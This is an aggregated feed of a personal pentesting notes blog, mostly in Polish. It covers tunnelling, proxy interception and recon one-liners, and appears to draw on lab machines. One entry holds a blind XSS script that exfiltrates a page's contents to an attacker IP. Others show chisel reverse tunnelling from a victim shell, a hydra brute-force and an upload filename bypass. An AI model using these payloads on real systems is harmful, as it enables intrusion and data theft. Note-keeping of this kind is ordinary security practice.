Quantcast
Channel: w4cky - BST
Viewing all 113 articles
Browse latest View live

SSH socks proxy beetwen Lan1 and Lan2

$
0
0
Linux in Lan1: ssh -R 5555:localhost:22 w4cky@VPS_IP -p 8080
Linux in Lan2: SSH -L 5000:127.0.0.1:5555 w4cky@VPS_IP -p 8080
Linux in Lan2: ssh -D 1234 root@localhost -p 5000


Alcatel-Lucent Security Advisory: CVE-2020-1179 (RCE)

$
0
0

OTMS remote code execution


I have discovered a vulnerability in OpenTouch Multimedia Services, making it possible for an attacker with administration rights to execute code on the server via web requests with high privileges.



Description of the vulnerability

Cgi script vmconstruct.cgi is vulnerable to shell command injection attacks through HTTP POST request. An attacker with an OT administrator cookie can inject arbitrary OS command using semicolon (;) character in the web request.

Impacts

OS command injection vulnerabilities can lead to elevate shell access on OT server for the attacker.


Reference: CVE-2020-11794
Date: April 15th, 2020
Risk: High
Impact: Get access
Attack expertise: Skilled, Administrative user
Attack requirements: Remote
CVSS score: 8.0 (HIGH)


Form Feed U+000C

$
0
0
 Znak, który czasami pozwala wyeskejpowac rozszerzenie plików w apkach webowych - •
// http://www.fileformat.info/info/unicode/char/000C/index.htm

POST /api/image_upload HTTP/1.1
Host: X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------91652467232091688581205088441
Content-Length: 631
Connection: close


-----------------------------91652467232091688581205088441
Content-Disposition: form-data; name="file"; filename=".svg•.pdf"
Content-Type: application/pdf

xxx
-----------------------------91652467232091688581205088441--


HTTP/1.1 200 OK
Date: Fri, 03 Jul 2020 08:09:26 GMT
Server: Apache/2
Upgrade: h2,h2c
Connection: Upgrade, close
Vary: Accept-Encoding,User-Agent
Content-Length: 21
Content-Type: text/html

1593763766-94292_.svg

find .git repo!

$
0
0
curl -s "https://crt.sh/?q=%25.domain.com&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew

Jak wygląda szybka infekcja ransomware wszystkich boxów w sieci? właśnie tak

$
0
0
https://thedfirreport.com/2020/08/31/netwalker-ransomware-in-1-hour/

How to parse ffuf output file

$
0
0
ffuf -o output_file cat output_file | jq -c '.results[] | {url:.url,status: .status}' for file in dirb/*; do cat $file | jq -c '.results[] | {url:.url,status: .status}'; done

Virtualbox + 4k (3840x2160) resolution on guest

$
0
0
PS C:\Program Files\Oracle\VirtualBox> .\VBoxManage.exe setextradata global GUI/MaxGuestResolution "3840,2160"
PS C:\Program Files\Oracle\VirtualBox> .\VBoxManage.exe getextradata global GUI/MaxGuestResolution
Value: 3840,2160
PS C:\Program Files\Oracle\VirtualBox> .\VBoxManage.exe setextradata "Kali" GUI/LastGuestSizeHint "3840,2160"

Forward local connections to local BURP PROXY / MITM PROXY

$
0
0


0)

sysctl -w net.ipv4.ip_forward=1

sysctl -w net.ipv6.conf.all.forwarding=1

sysctl -w net.ipv4.conf.all.send_redirects=0

 1) 

iptables -t nat -A OUTPUT -p tcp -m owner ! --uid-owner mitmproxyuser -d dst_ip -j REDIRECT --to-port 8080   

2) useradd --create-home mitmproxyuser

3) xhost +

4) sudo -u mitmproxyuser -H bash -c "export DISPLAY=:0.0;java -jar /usr/bin/burpsuite"   

or 

4) sudo -u mitmproxyuser -H bash -c "export DISPLAY=:0.0;mitmproxy"  



intercept http2 (grpc) in BURP SUITE PROXY

$
0
0

 as root:

iptables -t nat -A OUTPUT -p tcp -m owner ! --uid-owner mitmproxyuser -d 18.159.107.117 -j REDIRECT --to-port 8080          

adduser mitmproxyuser


cat /etc/nghttpx/nghttpx.conf   (downstream config)


frontend=0.0.0.0,8080;no-tls

backend=127.0.0.1,8081;;proto=http/1.1

backend-keep-alive-timeout=5m

frontend-http2-read-timeout=5m

frontend-read-timeout=5m

frontend-write-timeout=5m

stream-read-timeout=5m

stream-write-timeout=5m

backend-read-timeout=5m

backend-write-timeout=5m

backend-connect-timeout=5m

listener-disable-timeout=5m

backend-http2-window-size=134217720

backend-http2-connection-window-size=1073741760

frontend-http2-window-size=134217720

frontend-http2-connection-window-size=1073741760

http2-proxy=no

private-key-file=/etc/nghttpx/server.key

certificate-file=/etc/nghttpx/server.crt

cacert=/etc/nghttpx/ca.crt

accesslog-syslog=yes

errorlog-syslog=yes

workers=5


cat /etc/nghttpx/upstream.conf   (upstream config)

frontend=127.0.0.1,8082;no-tls

backend=vendor-IP,28900;;no-tls;proto=h2

backend-keep-alive-timeout=5m

frontend-http2-read-timeout=5m

frontend-read-timeout=5m

frontend-write-timeout=5m

stream-read-timeout=5m

stream-write-timeout=5m

backend-read-timeout=5m

backend-write-timeout=5m

backend-connect-timeout=5m

listener-disable-timeout=5m

http2-proxy=no

accesslog-syslog=yes

errorlog-syslog=yes

workers=5


run nghttp as root:


┌──(root💀kali)-[/etc/nghttpx]

└─# nghttpx

2020-12-18T14:38:21.383+01:00 8777 8777 99aaafb4 NOTICE (shrpx.cc:2882) Loading configuration from /etc/nghttpx/nghttpx.conf


run burp suite proxy 127.0.0.1:8081 (invisible proxy)

USER OPTIONS -> Upstream proxy add 127.0.0.1:8082


as mitmproxyuser:

┌──(mitmproxyuser㉿kali)-[/etc/nghttpx]

└─$ nghttpx --conf upstream.conf

2020-12-18T14:42:00.364+01:00 9293 9293 59e630c7 NOTICE (shrpx.cc:2882) Loading configuration from upstream.conf



as root:

run python code (client http2)











Red Team Notes 2.0

TCP/UDP reverse tunnel, transported over HTTP, secured via SSH - chisel

$
0
0
#### CHISEL INSTALL

curl https://i.jpillora.com/chisel! | bash

## copy to victim server: 
www-data@passage:/tmp$ wget http://10.10.14.143/chisel
wget http://10.10.14.143/chisel
--2021-01-25 08:55:34--  http://10.10.14.143/chisel
Connecting to 10.10.14.143:80... failed: Connection refused.
www-data@passage:/tmp$ wget http://10.10.14.143:8000/chisel
wget http://10.10.14.143:8000/chisel
--2021-01-25 08:55:47--  http://10.10.14.143:8000/chisel
Connecting to 10.10.14.143:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8704000 (8.3M) [application/octet-stream]
Saving to: 'chisel'

chisel              100%[===================>]   8.30M  5.33MB/s    in 1.6s    

2021-01-25 08:55:49 (5.33 MB/s) - 'chisel' saved [8704000/8704000]

www-data@passage:/tmp$ 


##  my computer:
chisel server -p 9999 --reverse

## victim computer 
./chisel client 10.10.14.143:9999 R:631:localhost:631

##############



hydra -l paul -P /usr/share/wordlists/rockyou.txt -s 631 -f 127.0.0.1 http-get /admin/log/error_log

New Cheatsheet XSS 2021

Blind XSS Data Exfiltration

$
0
0
cat 2.js

var xhr=new XMLHttpRequest();
xhr.open("GET", 'http://gym-club..htb/security_threat/report.php', false);
xhr.send();
var xhr2=new XMLHttpRequest();
xhr2.open("GET", "http://10.10.14.121/aaaa?=" + btoa(xhr.responseText), false);
xhr2.send();


└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.208 - - [13/Mar/2021 11:54:48] "GET /2.js HTTP/1.1" 200 -
10.10.10.208 - - [13/Mar/2021 11:54:48] code 404, message File not found
10.10.10.208 - - [13/Mar/2021 11:54:48] "GET /aaaa?=PCFET0NUWVBFIGh0bWw+CjxodG1sPgo8aGVhZD4KICA8dGl0bGU+U2VjdXJpdHkgUmVwb3J0PC90aXRsZT4KICA8c3R5bGU+CiAgICB0YWJsZSwgdGgsIHRkIHsKICAgICAgYm9yZGVyOiAxcHggc29saWQgYmxhY2s7CiAgICB9CiAgPC9zdHlsZT4KPC9oZWFkPgo8Ym9keT4KPGg0PkxvZ2dlZCBYU1MgYXR0ZW1wdHM8L2g0Pgo8dGFibGU+CiAgPHRoZWFkPgogICAgPHRyPgogICAgICA8dGQ+VGltZXN0YW1wPC90ZD4KICAgICAgPHRkPlVzZXIgQWdlbnQ8L3RkPgogICAgICA8dGQ+SVAgQWRkcmVzczwvdGQ+CiAgICA8L3RyPgogIDwvdGhlYWQ+Cjx0Ym9keT4KPC90Ym9keT4KPC9ib2R5Pgo8L2h0bWw+Cg== HTTP/1.1" 404 -

GoPhish - popraw swój phsihing

$
0
0

 Ciekawy artykuł, pokazujący jak zmienić GoPhish 

https://www.sprocketsecurity.com/blog/never-had-a-bad-day-phishing-how-to-set-up-gophish-to-evade-security-controls


SamSite Cookie

$
0
0

 

  • SameSite=None— plik cookie jest wysyłany we „wszystkich kontekstach” — mniej więcej tak, jak działały rzeczy przed wynalezieniem SameSite.
  • SameSite=Strict—plik cookie jest wysyłany tylko w przypadku żądań pochodzących z tej samej domeny. Nawet wchodząc na witrynę z linku spoza witryny, plik cookie nie zostanie wyświetlony, chyba że później odświeżysz stronę lub nawigujesz w obrębie witryny.
  • SameSite=Lax—plik cookie jest wysyłany, jeśli przejdziesz do witryny przez kliknięcie linku z innej domeny, ale nie, jeśli prześlesz formularz. To jest na ogół to, co chcesz chronić przed atakami CSRF!


https://simonwillison.net/2021/Aug/3/samesite/

https://samesite-lax-demo.vercel.app/

Red Teaming Gitbook Notes

AudioCast M5 stream music from linux/windows

$
0
0

 1) set music: 
http://192.168.51.173/httpapi.asp?command=setPlayerCmd:play:http://192.168.51.5/music/mata.mp3

2) loop(1)/or noloop(0)
http://192.168.51.173/httpapi.asp?command=setPlayerCmd:loopmode:1


3) listen radio internet

http://192.168.51.173/httpapi.asp?command=setPlayerCmd:play:http://pr320.pinguinradio.nl/listen.pls


https://github.com/AndersFluur/LinkPlayApi/blob/master/api.md


Stworzyłem skrypt, który sprawdza czy urządzenie jest włączone do prądu i jeśli jest to ma włączyć muzyke - do wykorzystania w inteligentnych domach.






cat playmusic.php                                                                                                                                                                                                                                              
<?php
$ip = "192.168.51.173";
while(1){
        $ping = exec("ping -c 1 -s 64 -t 64 ".$ip);
        if(!empty($ping))
        {
                //  Initiate curl session
                $handle = curl_init();
                // Will return the response, if false it prints the response
                curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
                // Set the url
                $url = "http://$ip/httpapi.asp?command=getPlayerStatus";
                curl_setopt($handle, CURLOPT_URL,$url);
                // Execute the session and store the contents in $result
                $result=curl_exec($handle);
                // Closing the session
                curl_close($handle);
                $array = json_decode($result, true);
        //      var_dump($array);

                if($array['Title']=='556E6B6E6F776E') // czyli jesli jest ten hash to nie gra
                {
                        echo 'nie gra'; // wiec trzeba puscic muzyke
                        //  Initiate curl session
                        $handle = curl_init();
                        // Will return the response, if false it prints the response
                        curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
                        // Set the url
                        $url_radio = "http://$ip/httpapi.asp?command=setPlayerCmd:play:http://pr320.pinguinradio.nl/listen.pls";
                        curl_setopt($handle, CURLOPT_URL,$url_radio);
                        // Execute the session and store the contents in $result
                        $result=curl_exec($handle);
                        // Closing the session
                        curl_close($handle);
                }
                else
                {
                        echo 'gra'; // gra radio wiec nic juz nie robie :) czekam
                        sleep(10);
                }
        }
}

Łamanie haseł online - nowa usługa

$
0
0

Uruchomiłem dla Was możliwość łamania haseł on-line na moich urządzeniach. 

Zbudowałem 4 komputery obliczeniowe złożone z: 

1) 10 x GPU RX 6600 XT

2) 10 x GPU RX 6600 XT

3) 3 x GPU RX 6600 i 3 x GPU 6600 XT 

4) 2 x GPU RX 6600 XT

Dzięki tej usłudze Twoje pentesty i red teamingi będą dużo bardziej skuteczne, w końcu będziesz miał szansę w szybkim czasie złamać przejęty hash. 

Jeśli sam zapomniałeś swojego hasła i masz hash  to ta usługa jest również dla Ciebie.  Jeśli zapomniałeś hasła do swojego WiFi to też możliwe jest jego złamanie bo dostarczeniu handshake.

Hasła są łamane  za pomocą hashcat.


Oferuje łamanie hashy w oparciu o swoje słowniki, ale również możesz dostarczyć swój słownik.


Koszt przedstawiam indywidualnie po kontakcie ze mną blaszczakm+hashcat @ gmail . com 

Usługa polega na wynajmie mocy obliczenowej jednego z 4 komputerów + konfiguracji po mojej stronie procesu odwracania hasha. Jako klient decydujesz czy wynajmujesz moc na kilka dni, czy kilka miesięcy. W momencie złamania hasha usługa może się zatrzymać i nie naliczać więcej opłaty. 
Możesz bez ryzyka wynająć moc na 1 miesiąc, a zapłacisz realnie tylko za 3 dni, jeśli w ciągu 3 dni hasło zostanie odwrócone. 


Usługa dedykowana pentesterom oraz działom bezpieczeństwa.  

P.S. 
Dla osób nietechnicznych - usługa nie łamie haseł do fecebooka, poczty itp. 
Usługa tylko odwraca hashe. Więc jeśli masz hash, który chcesz odwrócić to możesz się skontaktować. 


P.S.2
Dla moich klientów, którzy zamawiają u mnie testy penetracyjne usługa jest już wliczona w cenę. Jeśli w procesie testów penetracyjnych odnajdę hash hasła to od teraz ten hash będzie poddany testom bezpieczeństwa na powyższych komputerach, co pozwoli uzyskać moim klientom wyższą jakość usługi.  

apk.sh - ułatwia inżynierię wsteczną aplikacji na Androida

$
0
0

apk.sh to skrypt Bash, który ułatwia inżynierię wsteczną aplikacji na Androida, automatyzując niektóre powtarzalne zadania, takie jak ściąganie, dekodowanie, przebudowywanie i łatanie pliku APK.


Cechy

apk.sh zasadniczo używa apktool do dezasemblacji, dekodowania i odbudowy zasobów oraz trochę basha do automatyzacji procesu wstrzykiwania gadżetów frida . Obsługuje również pakiety aplikacji/podzielone pliki APK.


🍄 Łatanie plików APK w celu załadowania frida-gadget.so na starcie.

🆕 Obsługa pakietów aplikacji/podzielonych plików APK.

🔩 Przebudowywanie zdekodowanych zasobów z powrotem do binarnego pliku APK/JAR za pomocą apktool.

🗝️ Kod podpisując apk za pomocą apksigner.

https://github.com/ax/apk.sh

DOMAIN ADMIN Compromise in 3 HOURS

$
0
0

 https://infosecwriteups.com/domain-admin-compromise-in-3-hours-5778902604c9


Viewing all 113 articles
Browse latest View live